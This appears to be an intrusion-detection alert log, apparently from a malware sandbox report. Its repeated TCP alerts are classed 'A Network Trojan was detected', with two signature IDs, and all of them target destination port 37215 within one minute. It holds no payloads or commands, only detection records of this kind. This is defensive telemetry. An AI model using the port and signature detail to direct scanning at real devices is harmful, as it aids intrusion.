          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510342
          SID:2835222
          Source Port:35368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059848
          SID:2829579
          Source Port:50676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407204
          SID:2835222
          Source Port:51696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018909
          SID:2835222
          Source Port:51156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352217
          SID:2835222
          Source Port:33578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014362
          SID:2835222
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744469
          SID:2835222
          Source Port:60002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444163
          SID:2829579
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176296
          SID:2835222
          Source Port:38512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239777
          SID:2829579
          Source Port:50520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107747
          SID:2835222
          Source Port:56168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792851
          SID:2829579
          Source Port:53578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894203
          SID:2829579
          Source Port:50552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021458
          SID:2835222
          Source Port:36922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817705
          SID:2835222
          Source Port:57216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729494
          SID:2829579
          Source Port:37344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547908
          SID:2829579
          Source Port:53762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741231
          SID:2835222
          Source Port:53018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887011
          SID:2835222
          Source Port:55008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890813
          SID:2835222
          Source Port:52604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706328
          SID:2835222
          Source Port:46578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816994
          SID:2829579
          Source Port:40814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109144
          SID:2835222
          Source Port:57762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299485
          SID:2835222
          Source Port:54174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742670
          SID:2835222
          Source Port:56924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554500
          SID:2829579
          Source Port:34618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017008
          SID:2829579
          Source Port:54560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351734
          SID:2835222
          Source Port:41340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781883
          SID:2829579
          Source Port:39680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173432
          SID:2829579
          Source Port:48652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672793
          SID:2835222
          Source Port:39056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796519
          SID:2829579
          Source Port:52258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884401
          SID:2829579
          Source Port:41114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271919
          SID:2829579
          Source Port:56910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446014
          SID:2835222
          Source Port:48788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158156
          SID:2829579
          Source Port:39326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799464
          SID:2835222
          Source Port:39158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510916
          SID:2835222
          Source Port:45088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553208
          SID:2835222
          Source Port:47222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513611
          SID:2835222
          Source Port:54556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832445
          SID:2829579
          Source Port:47296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817566
          SID:2829579
          Source Port:58620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706753
          SID:2835222
          Source Port:56954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466201
          SID:2835222
          Source Port:44160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512510
          SID:2829579
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673004
          SID:2835222
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.062731
          SID:2835222
          Source Port:40412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514382
          SID:2835222
          Source Port:49138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734742
          SID:2829579
          Source Port:53622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177173
          SID:2835222
          Source Port:35164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130646
          SID:2835222
          Source Port:36986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406942
          SID:2829579
          Source Port:40530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131273
          SID:2829579
          Source Port:54352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161717
          SID:2835222
          Source Port:42422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240994
          SID:2829579
          Source Port:35564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038006
          SID:2829579
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855339
          SID:2835222
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159046
          SID:2835222
          Source Port:55588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020805
          SID:2829579
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780549
          SID:2835222
          Source Port:49462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401863
          SID:2829579
          Source Port:50010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707145
          SID:2829579
          Source Port:34012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897971
          SID:2835222
          Source Port:40426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736931
          SID:2829579
          Source Port:48474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005648
          SID:2829579
          Source Port:48758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156079
          SID:2829579
          Source Port:55426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734704
          SID:2835222
          Source Port:54724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708648
          SID:2829579
          Source Port:35862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109162
          SID:2829579
          Source Port:40976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019509
          SID:2835222
          Source Port:39116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258413
          SID:2829579
          Source Port:55900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172584
          SID:2829579
          Source Port:43772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356577
          SID:2835222
          Source Port:39554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352777
          SID:2829579
          Source Port:48248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555254
          SID:2835222
          Source Port:38264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169501
          SID:2829579
          Source Port:56882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180062
          SID:2829579
          Source Port:40800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270805
          SID:2829579
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176022
          SID:2829579
          Source Port:46996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157359
          SID:2835222
          Source Port:44866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861549
          SID:2829579
          Source Port:56856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067519
          SID:2829579
          Source Port:57910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602473
          SID:2829579
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179357
          SID:2835222
          Source Port:46332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748075
          SID:2835222
          Source Port:48930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829449
          SID:2835222
          Source Port:53334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663572
          SID:2829579
          Source Port:53984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805909
          SID:2835222
          Source Port:48630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837147
          SID:2835222
          Source Port:39760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787476
          SID:2829579
          Source Port:55248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786493
          SID:2829579
          Source Port:52342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018853
          SID:2829579
          Source Port:55884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789528
          SID:2829579
          Source Port:43326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464891
          SID:2829579
          Source Port:56406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600856
          SID:2835222
          Source Port:56674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742915
          SID:2835222
          Source Port:55394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862572
          SID:2835222
          Source Port:45358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108547
          SID:2829579
          Source Port:43996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114316
          SID:2829579
          Source Port:50380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813924
          SID:2835222
          Source Port:49672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463810
          SID:2835222
          Source Port:43564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510424
          SID:2835222
          Source Port:47848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020494
          SID:2835222
          Source Port:45232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857568
          SID:2829579
          Source Port:58552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155434
          SID:2829579
          Source Port:60632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260585
          SID:2829579
          Source Port:60194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861891
          SID:2829579
          Source Port:46428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463212
          SID:2829579
          Source Port:53374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818799
          SID:2835222
          Source Port:36178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175701
          SID:2835222
          Source Port:39064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517314
          SID:2835222
          Source Port:42782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892546
          SID:2835222
          Source Port:42822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259070
          SID:2829579
          Source Port:40312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791747
          SID:2835222
          Source Port:48430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553017
          SID:2829579
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796298
          SID:2835222
          Source Port:56948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670575
          SID:2829579
          Source Port:33188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351527
          SID:2835222
          Source Port:34358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155470
          SID:2835222
          Source Port:38852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449920
          SID:2835222
          Source Port:35422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441410
          SID:2829579
          Source Port:36044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672869
          SID:2829579
          Source Port:57298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131192
          SID:2835222
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449230
          SID:2835222
          Source Port:33048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800750
          SID:2829579
          Source Port:59880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862989
          SID:2835222
          Source Port:43896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600536
          SID:2835222
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241669
          SID:2829579
          Source Port:49536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036140
          SID:2835222
          Source Port:34880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857959
          SID:2835222
          Source Port:50370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745914
          SID:2835222
          Source Port:44642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465010
          SID:2829579
          Source Port:45314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744705
          SID:2835222
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238073
          SID:2835222
          Source Port:43360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112199
          SID:2835222
          Source Port:60356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178407
          SID:2835222
          Source Port:51286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021083
          SID:2829579
          Source Port:42692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112600
          SID:2835222
          Source Port:39182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837298
          SID:2835222
          Source Port:37412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257534
          SID:2835222
          Source Port:34462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515606
          SID:2835222
          Source Port:51030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133838
          SID:2829579
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549769
          SID:2835222
          Source Port:36044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353668
          SID:2835222
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461325
          SID:2835222
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495574
          SID:2829579
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514175
          SID:2829579
          Source Port:33276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794726
          SID:2835222
          Source Port:55240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895901
          SID:2829579
          Source Port:56976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748036
          SID:2829579
          Source Port:48052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180447
          SID:2835222
          Source Port:43762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.594921
          SID:2829579
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259200
          SID:2835222
          Source Port:53298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129422
          SID:2829579
          Source Port:47146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861365
          SID:2835222
          Source Port:45232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808666
          SID:2829579
          Source Port:36958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176892
          SID:2835222
          Source Port:39242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732727
          SID:2829579
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706224
          SID:2829579
          Source Port:44838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460126
          SID:2835222
          Source Port:54878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178646
          SID:2835222
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551425
          SID:2829579
          Source Port:40054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021911
          SID:2835222
          Source Port:36432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174978
          SID:2835222
          Source Port:40584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663724
          SID:2829579
          Source Port:55996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673043
          SID:2835222
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108475
          SID:2829579
          Source Port:54424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550859
          SID:2835222
          Source Port:47674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732957
          SID:2829579
          Source Port:50760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707350
          SID:2835222
          Source Port:35266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744500
          SID:2835222
          Source Port:58168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170592
          SID:2829579
          Source Port:46138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704344
          SID:2835222
          Source Port:46544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075374
          SID:2829579
          Source Port:46278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174465
          SID:2835222
          Source Port:38846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912952
          SID:2829579
          Source Port:35072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107814
          SID:2829579
          Source Port:57406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352774
          SID:2829579
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495951
          SID:2829579
          Source Port:45308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912347
          SID:2835222
          Source Port:38388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396852
          SID:2835222
          Source Port:54210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746438
          SID:2835222
          Source Port:59890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465748
          SID:2829579
          Source Port:37736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861165
          SID:2829579
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354114
          SID:2829579
          Source Port:46314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731930
          SID:2829579
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894827
          SID:2835222
          Source Port:46904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018325
          SID:2835222
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136095
          SID:2835222
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112531
          SID:2829579
          Source Port:38004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707985
          SID:2829579
          Source Port:47724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884450
          SID:2835222
          Source Port:35972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912957
          SID:2829579
          Source Port:45854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667246
          SID:2835222
          Source Port:53386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730875
          SID:2835222
          Source Port:46602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600409
          SID:2829579
          Source Port:54282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063321
          SID:2829579
          Source Port:52996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
